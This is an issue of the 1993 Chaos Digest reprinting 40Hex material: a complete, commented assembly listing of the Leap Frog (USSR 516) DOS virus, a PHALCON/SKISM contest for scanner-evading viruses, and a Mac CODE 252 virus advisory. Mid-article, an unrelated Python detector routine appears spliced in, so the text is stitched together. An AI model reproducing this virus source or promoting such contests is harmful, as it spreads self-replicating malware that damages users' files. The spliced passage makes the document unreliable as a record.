Chaos Digest               Friday 25 June 1993             Volume 1 : Number 62
                                                                ISSN 1244-4901

       Editor: Jean-Bernard Condat (jbcondat@attmail.com)
       Archivist: Yves-Marie Crabbe
       Co-editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.62 (25 June 1993)
File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter.  Subscriptions are
available at no cost by sending a message to:

                linux-activists-request@niksula.hut.fi

with a mail header or first line containing the following information:

                X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155,
93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS
(+352) 466893.

Back issues of ChaosD can be found on the Internet as part of the Computer
underground Digest archives.  They're accessible using anonymous FTP:

  * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
  * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views.  ChaosD
material may be reprinted for non-profit as long as the source is cited.  Some
authors do copyright their material, and they should be contacted for reprint
permission.  Readers are encouraged to submit reasoned articles in French,
English or German languages relating to computer culture and
telecommunications.  Articles are preferred to short responses.
Please avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators.  Chaos Digest contributors assume all responsibility
for ensuring that articles submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint)

40Hex Number 7 Volume 2 Issue 3                                       File 006

Virus Spotlite on: Leap Frog

It's always interesting to find new residency techniques.  I suppose everyone
by now is tired of the traditional high-memory loading routine and is on the
lookout for something different.  40Hex comes to the rescue!

This virus, the "Leap Frog" or USSR 516, has one of the most unique methods I
have ever seen.  I was mucking around in VSUM and noticed that, according to
Patricia, it "installs itself in a hole in memory between MSDOS and the DOS
Stacks."  She is, of course, not telling us the entire story.  Leap Frog
basically latches onto and resides in a DOS disk buffer.  I do not know who the
author is, but I commend him for his innovative technique.

I took the liberty of disassembling the virus which is given below.  It should
be an exact byte-for-byte matchup of the original carrier file (or at least
should be extremely similar).  The offsets are in their correct locations, etc,
etc.  It is simple to understand and terribly efficient.

Although the coding is tight, there are some inconsistencies.  For example, I
do not understand the purpose of the timing routine (int 21h/ah=30h) in the
code.  I also do not understand why the author decided to infect COM files in
such an abnormal way.  An interesting "feature" is the disabling of
Control-Break checking - a thoroughly unnecessary piece of code.
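That "abnormal" COM infection leaves a layout that a scanner can recognise and undo without any signature of the virus body, so here is an added detector and repair routine (editor-supplied Python, not code from the article or from 40Hex): the host's own JMP at 100h is kept, the four bytes at its target are replaced by a second JMP whose fourth byte is the sum of the two displacement bytes, and that JMP lands on the 204h-byte body appended at the old end of file, which starts with push ax / call (50 E8 0C 00) and carries the four displaced host bytes at offset 4. The constructed sample, the function names and the filler body are assumptions of mine, taken from the listing rather than from a real infected file.

```python
import struct

VIRUS_LEN = 0x204                   # bytes appended ("mov cx,204h ; Write virus")
BODY_PREFIX = b"\x50\xe8\x0c\x00"   # push ax / call beginvir: first bytes after `start`
ORIG4_OFF = 4                       # orig4 sits right after that call in the body


def _u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def leapfrog_layout(image):
    """Return the double-JMP layout of a COM image, or None if it is absent.

    All offsets are file offsets (the COM load offset 100h is subtracted).
    """
    if len(image) < VIRUS_LEN + 7 or image[0] != 0xE9:
        return None
    jmploc = 3 + _u16(image, 1)                  # where the host's own JMP lands
    if jmploc + 4 > len(image) or image[jmploc] != 0xE9:
        return None
    lo, hi, chk = image[jmploc + 1], image[jmploc + 2], image[jmploc + 3]
    if (lo + hi) & 0xFF != chk:                  # "add al,ah" stored as the 4th byte
        return None
    body = (jmploc + 3 + (lo | hi << 8)) & 0xFFFF
    if body != len(image) - VIRUS_LEN:           # second JMP must land on the body
        return None
    return {"jmploc": jmploc, "body": body,
            "prefix_ok": image[body:body + 4] == BODY_PREFIX}


def repair(image):
    """Put the displaced host bytes back and drop the appended body."""
    info = leapfrog_layout(image)
    if info is None:
        return image
    j, b = info["jmploc"], info["body"]
    orig4 = image[b + ORIG4_OFF:b + ORIG4_OFF + 4]
    return image[:j] + orig4 + image[j + 4:b]


def make_constructed_sample():
    """A tiny clean COM image and a synthetic copy laid out as the listing
    would leave it.  The body is filler, not virus code (constructed)."""
    # jmp +2 ; nop ; nop ; entry: mov ax,4C00h ; int 21h
    clean = b"\xe9\x02\x00" + b"\x90\x90" + b"\xb8\x00\x4c\xcd\x21"
    jmploc = 3 + 2                                   # = 5
    disp = len(clean) - jmploc - 3                   # "sub ax,dx ; sub ax,3"
    lo, hi = disp & 0xFF, disp >> 8
    patch = bytes([0xE9, lo, hi, (lo + hi) & 0xFF])  # the rewritten 4 bytes
    body = BODY_PREFIX + clean[jmploc:jmploc + 4] + b"\x00" * 8
    body += b"\xcc" * (VIRUS_LEN - len(body))
    infected = clean[:jmploc] + patch + clean[jmploc + 4:] + body
    return clean, infected
```

The same walk (first JMP, second JMP with checksum byte, body exactly 204h bytes before end of file) is what a scanner needs to flag a file; `repair` is only safe once `leapfrog_layout` has confirmed all three.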
I believe further that the line above "findmarker" should read:

        lds     di,dword ptr ds:[30h*4]

In any case, the code is otherwise very, very good.  It is great for studying
by newcomers and "oldtimers" alike.

Things to look for:
  Residency routine
  Lack of extensive use of relative offsets
  Use of stack frame in the interrupt handler
  Critical error handler

Enjoy!

Dark Angel of PHALCON/SKISM

ussr516 segment byte public
        assume  cs:ussr516, ds:ussr516
        org     100h

;Disassembled by Dark Angel of PHALCON/SKISM
;for 40Hex Number 7 Volume 2 Issue 3

stub:   db      0e9h, 0, 0
        db      0e9h, 1, 0, 0

;This is where the virus really begins
start:
        push    ax
        call    beginvir
orig4   db      0cdh, 20h, 0, 0
int30store db   0, 0, 0, 0              ;Actually it's int 21h
                                        ;entry point
int21store db   0, 0, 0, 0
beginvir:
        pop     bp                      ;BP -> orig4
        mov     si,bp
        mov     di,103h
        add     di,[di-2]               ;DI -> orig4
        movsw                           ;restore original
        movsw                           ;4 bytes of program
        xor     si,si
        mov     ds,si
        les     di,dword ptr ds:[21h*4]
        mov     [bp+8],di               ;int21store
        mov     [bp+0Ah],es
        lds     di,dword ptr ds:[30h*4+1] ;Bug????
findmarker:
        inc     di
        cmp     word ptr [di-2],0E18Ah  ;Find marker bytes
        jne     findmarker              ;to the entry point
        mov     [bp+4],di               ;and move to
        mov     [bp+6],ds               ;int30store
        mov     ax,5252h                ;Get list of lists
        int     21h                     ;and also ID check
        add     bx,12h                  ;Already installed?
        jz      quitvir                 ;then exit
        push    bx
        mov     ah,30h                  ;Get DOS version
        int     21h
        pop     bx                      ;bx = 12, ptr to 1st
                                        ;disk buffer
        cmp     al,3
        je      handlebuffer            ;if DOS 3
        ja      handleDBHCH             ;if > DOS 3
        inc     bx                      ;DOS 2.X, offset is 13
handlebuffer:
        push    ds
        push    bx
        lds     bx,dword ptr [bx]       ;Get seg:off of buffer
        inc     si
        pop     di
        pop     es                      ;ES:DI->seg:off buff
        mov     ax,[bx]                 ;ptr to next buffer
        cmp     ax,0FFFFh               ;least recently used?
        jne     handlebuffer            ;if not, go find it
        cmp     si,3
        jbe     quitvir
        stosw
        stosw
        jmp     short movetobuffer
handleDBHCH:                            ;Disk Buffer Hash Chain Head array
        lds     si,dword ptr [bx]       ;ptr to disk buffer
        lodsw                           ;info
        lodsw                           ;seg of disk buffer
                                        ;hash chain head array
        inc     ax                      ;second entry
        mov     ds,ax
        xor     bx,bx
        mov     si,bx
        lodsw                           ;EMS page, -1 if not
                                        ;in EMS
        xchg    ax,di                   ;save in di
        lodsw                           ;ptr to least recently
                                        ;used buffer
        mov     [di+2],ax               ;change disk buffer
                                        ;backward offset to
                                        ;least recently used
        xchg    ax,di                   ;restore EMS page
        mov     [di],ax                 ;set to least recently
movetobuffer:                           ;used
        mov     di,bx
        push    ds
        pop     es                      ;ES:DI -> disk buffer
        push    cs
        pop     ds
        mov     cx,108h
        lea     si,[bp-4]               ;Copy from start
        rep     movsw
        mov     ds,cx                   ;DS -> interrupt table
        mov     word ptr ds:[4*21h],0BCh ;New interrupt handler
        mov     word ptr ds:[4*21h+2],es ;at int21
quitvir:
        push    cs                      ;CS = DS = ES
        pop     es
        push    es
        pop     ds
        pop     ax
        mov     bx,ax
        mov     si, 100h                ;set up stack for
        push    si                      ;the return to the
        retn                            ;original program
int24:
        mov     al,3                    ;Ignore all errors
        iret
tickstore db    3                       ;Why???
buffer  db      3, 0, 9, 0
int21:
        pushf
        cli                             ;CP/M style call entry
        call    dword ptr cs:[int30store-start]
        retn                            ;point of int 21h
int21DSDX:                              ;For int 21h calls
        push    ds                      ;with
        lds     dx,dword ptr [bp+2]     ;DS:DX -> filename
        call    int21
        pop     ds
        retn
        cmp     ax,4B00h                ;Execute
        je      Execute
        cmp     ax,5252h                ;ID check
        je      CheckID
        cmp     ah,30h                  ;DOS Version
        je      DosVersion
callorig21:                             ;Do other calls
        jmp     dword ptr cs:[int21store-start]
DosVersion:                             ;Why?????
                                        ;DOS Version
        dec     byte ptr cs:[tickstore-start]
        jnz     callorig21              ;Continue if not 0
        push    es
        xor     ax,ax
        push    ax
        mov     es,ax
        mov     al,es:[46Ch]            ; 40h:6Ch = Timer ticks
                                        ; since midnight
        and     al,7                    ; MOD 15
        inc     ax
        inc     ax
        mov     cs:[tickstore-start],al ;# 2-17
        pop     ax
        pop     es
        iret
CheckID:                                ;ID Check
        mov     bx,0FFEEh               ;FFEEh = -12h
        iret
Execute:                                ;Execute
        push    ax                      ;Save registers
        push    cx
        push    es
        push    bx
        push    ds                      ;DS:DX -> filename
        push    dx                      ;save it on stack
        push    bp
        mov     bp,sp                   ;Set up stack frame
        sub     sp,0Ah                  ;Temporary variables
                                        ;[bp-A] = attributes
                                        ;[bp-8] = int 24 off
                                        ;[bp-6] = int 24 seg
                                        ;[bp-4] = file time
                                        ;[bp-2] = file date
        sti
        push    cs
        pop     ds
        mov     ax,3301h                ;Turn off ^C check
        xor     dl,dl                   ;(never turn it back
        call    int21                   ; on. Bug???)
        mov     ax,3524h                ;Get int 24h
        call    int21                   ;(Critical error)
        mov     [bp-8],bx
        mov     [bp-6],es
        mov     dx,int24-start
        mov     ax,2524h                ;Set to new one
        call    int21
        mov     ax,4300h                ;Get attributes
        call    int21DSDX
        jnc     continue
doneinfect:
        mov     ax,2524h                ;Restore crit error
        lds     dx,dword ptr [bp-8]     ;handler
        call    int21
        cli
        mov     sp,bp
        pop     bp
        pop     dx
        pop     ds
        pop     bx
        pop     es
        pop     cx
        pop     ax
        jmp     short callorig21        ;Call orig handler
continue:
        mov     [bp-0Ah],cx             ;Save attributes
        test    cl,1                    ;Check if r/o????
        jz      noclearattr
        xor     cx,cx
        mov     ax,4301h                ;Clear attributes
        call    int21DSDX               ;Filename in DS:DX
        jc      doneinfect              ;Quit on error
noclearattr:
        mov     ax,3D02h                ;Open read/write
        call    int21DSDX               ;Filename in DS:DX
        jc      doneinfect              ;Exit if error
        mov     bx,ax
        mov     ax,5700h                ;Save time/date
        call    int21
        mov     [bp-4],cx
        mov     [bp-2],dx
        mov     dx,buffer-start
        mov     cx,4
        mov     ah,3Fh                  ;Read 4 bytes to
        call    int21                   ;buffer
        jc      quitinf
        cmp     byte ptr ds:[buffer-start],0E9h ;Must start with 0E9h
        jne     quitinf                 ;Otherwise, quit
        mov     dx,word ptr ds:[buffer+1-start] ;dx = jmploc
        dec     dx
        xor     cx,cx
        mov     ax,4201h                ;go there
        call    int21
        mov     ds:[buffer-start],ax    ;new location offset
        mov     dx,orig4-start
        mov     cx,4
        mov     ah,3Fh                  ;Read 4 bytes there
        call    int21
        mov     dx,ds:[orig4-start]
        cmp     dl,0E9h                 ;0E9h means we might
        jne     infect                  ;already be there
        mov     ax,ds:[orig4+2-start]   ;continue checking
        add     al,dh                   ;to see if we really
        sub     al,ah                   ;are there.
        jz      quitinf
infect:
        xor     cx,cx
        mov     dx,cx
        mov     ax,4202h                ;Go to EOF
        call    int21
        mov     ds:[buffer+2-start],ax  ;save filesize
        mov     cx,204h
        mov     ah,40h                  ;Write virus
        call    int21
        jc      quitinf                 ;Exit if error
        sub     cx,ax
        jnz     quitinf
        mov     dx,ds:[buffer-start]
        mov     ax,ds:[buffer+2-start]
        sub     ax,dx
        sub     ax,3                    ;AX->jmp offset
        mov     word ptr ds:[buffer+1-start],ax ;Set up buffer
        mov     byte ptr ds:[buffer-start],0E9h ;code the jmp
        add     al,ah
        mov     byte ptr ds:[buffer+3-start],al
        mov     ax,4200h                ;Rewind to jmploc
        call    int21
        mov     dx, buffer-start
        mov     cx,4                    ;Write in the jmp
        mov     ah,40h
        call    int21
quitinf:
        mov     cx,[bp-4]
        mov     dx,[bp-2]
        mov     ax,5701h                ;Restore date/time
        call    int21
        mov     ah,3Eh                  ;Close file
        call    int21
        mov     cx,[bp-0Ah]             ;Restore attributes
        mov     ax,4301h
        call    int21DSDX
        jmp     doneinfect              ;Return
ussr516 ends
        end     stub

+++++

40Hex Number 7 Volume 2 Issue 3                                       File 007

Just a friendly reminder:

                        ------------------------
                             Virus Contest!
                           'The Spammies(tm)'
                        ------------------------

Deadline: July 4th, 1992

This is the first PHALCON/SKISM virus contest.  As a matter of fact, this is
the first contest of its kind.
We believe that it will motivate you to produce more original code, rather
than more hacks.  Winners may have already won $10,000,000, as well as the
prestige of winning the first ever 'Spammie' awards.

Rules and Regulations:

 1) All submissions must be original source code. (no hacks)
 2) Only one submission is allowed per programmer, plus one group project.
 3) All viruses must be received by us before July 4th, 1992.
 4) Viruses must be accompanied by a complete entry form. (see below)
 5) The original, compilable, commented source MUST be included, along with
    an installer program, or a dropper, in the case of boot block viruses.
 6) Entries must include a location where the author may be contacted, such
    as an email address or a BBS.
 7) Personnel or persons related to personnel of PHALCON/SKISM are not
    eligible.
 8) The source must compile without error under Tasm or Masm (please specify
    what assembler and version you used, along with the necessary command
    line switches).  If we cannot compile your virus, it will be disqualified.
 9) All entries receive a free subscription to 40hex. (hehehehe)
10) The entry must be uploaded privately to the sysop, stating that it is a
    contest entry.
11) The viruses must not be detectable by the current version (as of July
    4th) of any known virus scanner.
12) Viruses will be judged by our 'panel of experts' in three categories.
    12.1) Stealth
    12.2) Size
    12.3) Reproductivity
    12.4) Performance

For example, Red Cross is an example of a 'high performance' virus.  It was
entertaining and well done.

*** Entry Form

Handle ________________________

Group Affiliation ______________

Virus Name ____________________

Size ____bytes (if you need more spaces, go away)

Type
___ File Infector
___ Boot block

Infection method
___ Direct Action
___ Memory Resident
___ Directory chain
___ Other (please describe it in detail)

Encryption routine
___ None (bah)
___ Xor loop
___ Other (please describe it in detail)

Describe what makes your infection routine unique.
_______________________________________________________________________________
_______________________________________________________________________________

Describe what makes your encryption routine unique.
_______________________________________________________________________________
_______________________________________________________________________________

Describe what means your virus uses, other than encryption, to keep itself
hidden.
_______________________________________________________________________________
_______________________________________________________________________________

What is the largest possible scan string for this virus? __bytes

What else sets this virus apart from other viruses?
_______________________________________________________________________________
_______________________________________________________________________________
_______________________________________________________________________________

+++++

40Hex Number 7 Volume 2 Issue 3                                       File 008

More Virus News.  An informed virus Programmer is a good one.

Article 1: New Macintosh Virus
Article 2: RockSteady's 666 Virus [NuKE]
Article 3: A Stooge's View

<<<<<<<<< Article 1 <<<<<<<<<

Date: Fri, 17 Apr 92 11:34:50 -0500
From: Gene Spafford
Subject: Mac announcement - new virus (Mac)

                    New Macintosh Virus Discovered
                            17 April 1992

Virus:            CODE 252
Damage:           some, possibly severe (see text)
Spread:           unknown (see text)
Systems affected: Apple Macintosh computers.  All types, but see text.

A new virus, which has been designated "CODE 252", has been discovered on
Apple Macintosh computer systems.  This virus is designed to trigger if an
infected application is run or system booted between June 6 and December 31,
inclusive.  When triggered, the virus brings up a dialog box with the message:

        You have a virus.
        Ha Ha Ha Ha Ha Ha Ha
        Now erasing all disks...
        Ha Ha Ha Ha Ha Ha Ha
        P.S. Have a nice day.
        Ha Ha Ha Ha Ha Ha Ha
        (Click to continue...)
Despite this message, no files or directories are deleted in the versions of
the virus we have seen; however, a worried user might power down the system
upon seeing the message, and thus corrupt the disk -- this could lead to
significant damage.  Furthermore, the virus may interact with some
applications in such a manner as to damage them.  Under System 7, the System
file can be seriously damaged by the virus under at least some circumstances
as the virus attempts to spread.  This may lead to a system that will not
boot, crashes, or other unusual behavior.

Between January 1 and June 5, inclusive, the virus simply spreads from
applications to system files, and then on to other application files.  At the
present moment, we have no indication that the virus causes direct damage to
any existing applications.

The virus does not spread to other applications under MultiFinder on System
6.x systems, nor will it spread under System 7.  However, it will run on those
systems if an infected application is executed.  Even if you are running one
of these systems, we recommend you obtain and use one of the latest versions
of appropriate anti-virus software.

As of the date of this announcement (17 April 92), we have had limited
reported sightings of this virus.  This, combined with the nature of operation
of the virus, leads us to believe that the virus is not yet widespread.

The current versions of Gatekeeper and SAM Intercept (in advanced and custom
mode) are effective against this virus.  Either program should generate an
alert if the virus is present and attempts to spread to other files.  The
Virex Record/Scan feature will also detect the virus.

Authors of all major Macintosh anti-virus tools are planning updates to their
tools to locate and/or eliminate this virus.  Some of these are listed below.
We recommend that you obtain and run a CURRENT version of AT LEAST ONE of
these programs.

Some specific information on updated Mac anti-virus products follows:

Tool: Disinfectant
Status: Free software (courtesy of Northwestern University and John Norstad)
Revision to be released: 2.8
Where to find: usual archive sites and bulletin boards -- ftp.acns.nwu.edu,
  sumex-aim.stanford.edu, rascal.ics.utexas.edu, AppleLink, America Online,
  CompuServe, Genie, Calvacom, MacNet, Delphi, comp.binaries.mac
When available: soon

Tool: Gatekeeper
Status: Free software (courtesy of Chris Johnson)
Revision to be released: 1.2.6 (probably)
Where to find: usual archive sites and bulletin boards --
  microlib.cc.utexas.edu, sumex-aim.stanford.edu, rascal.ics.utexas.edu,
  comp.binaries.mac
When available: eventually
Comments: Gatekeeper should find this virus if it attempts to infect your
  system or applications, and thus does not need an update.  Gatekeeper Aid
  will need an update to "know" exactly what virus it is seeing so it can
  remove the virus, but the update is not crucial for continued protection.
  As Gatekeeper is freeware and Chris has a "real" life, this update may not
  be immediate.

Tool: Rival
Status: Commercial software
Revision to be released: Rival 1.1.9v (CODE 252 Vaccine or Refresh 1.1.9v)
Where to find it: AppleLink, America Online, Internet, Compuserve.
When available: Immediately.

Tool: SAM (Virus Clinic and Intercept)
Status: Commercial software
Revision to be released: 3.0.8
Where to find: CompuServe, America Online, Applelink, Symantec's Bulletin
  Board @ 408-973-9598
When available: 17 April 1992.  Version 3.0.8 of the Virus Definitions file
  is also available.

Tool: Virex INIT
Status: Commercial software
Revision to be released: 3.8
Where to find: Microcom, Inc (919) 490-1277
When available: Immediately.
Comments: Virex 3.8 will detect and repair the virus.  All Virex subscribers
  will automatically be sent an update on diskette.  All other registered
  users will receive a notice with information to update prior versions to be
  able to detect CODE 252.  This information is also available on Microcom's
  BBS, (919) 419-1602, and is presented here:

    Guide Number = 6324448
    1: 0203 3001 7778 2A00 / 79
    2: 0C50 4EFA 0003 A9AB / C4
    3: 0004 A9AA 0002 A647 / B2
    4: 8180 9090 9090 9090 / 1B

Tool: Virus Detective
Status: Shareware
Revision to be released: 5.0.4
Where to find: Usual bulletin boards will announce a new search string.
  Registered users will also get a mailing with the new search string.
When available: Immediately.
Comments: search strings are:

    Resource Start & Size < 1200 & WData 2F2C#23F3C#2A9A0*3F3C#24878#2A9AB;
    For find CODE 252 in Appl's

    Filetype=ZSYS & Resource INIT & Size < 1200 & WData 2F2C# 3F3C#2A9A0*3F3C#24878 #2A9AB;
    For find CODE 252 in System

If you discover what you believe to be a virus on your Macintosh system,
please report it to the vendor/author of your anti-virus software package for
analysis.  Such reports make early, informed warnings like this one possible
for the rest of the Mac community.

------------------------------

End of Chaos Digest #1.62
************************************